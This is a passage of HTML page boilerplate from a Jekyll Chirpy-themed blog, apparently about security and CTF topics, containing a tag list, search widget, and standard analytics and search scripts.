author.">Some rights reserved.</span></p></div></div></footer></div><!-- The Search results v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-xl-11 post-content"><div id="search-hints"><h4 class="text-muted mb-4">Trending Tags</h4><a class="post-tag" href="/tags/sql/">SQL</a> <a class="post-tag" href="/tags/ctf/">CTF</a> <a class="post-tag" href="/tags/permissions/">Permissions</a> <a class="post-tag" href="/tags/ssh/">SSH</a> <a class="post-tag" href="/tags/php/">PHP</a> <a class="post-tag" href="/tags/enumeration/">Enumeration</a> <a class="post-tag" href="/tags/windows/">Windows</a> <a class="post-tag" href="/tags/smb/">SMB</a> <a class="post-tag" href="/tags/john/">John</a> <a class="post-tag" href="/tags/file-upload/">File Upload</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <!-- The GA snippet v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-167902069-1', 'auto'); ga('send', 'pageview'); </script> --> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-167902069-1" crossorigin="anonymous"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-167902069-1'); </script> <!-- Jekyll Simple Search loader v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js" integrity="sha256-qcLR00zq6pJk4je3MLgAri8Nn+ZumUlXgTKR2H/xCY0=" crossorigin="anonymous"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="https://diego95root.github.io{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"><div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>{categories}</div><div><i class="fa fa-tag fa-fw"></i>{tags}</div></div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>' }); </script>
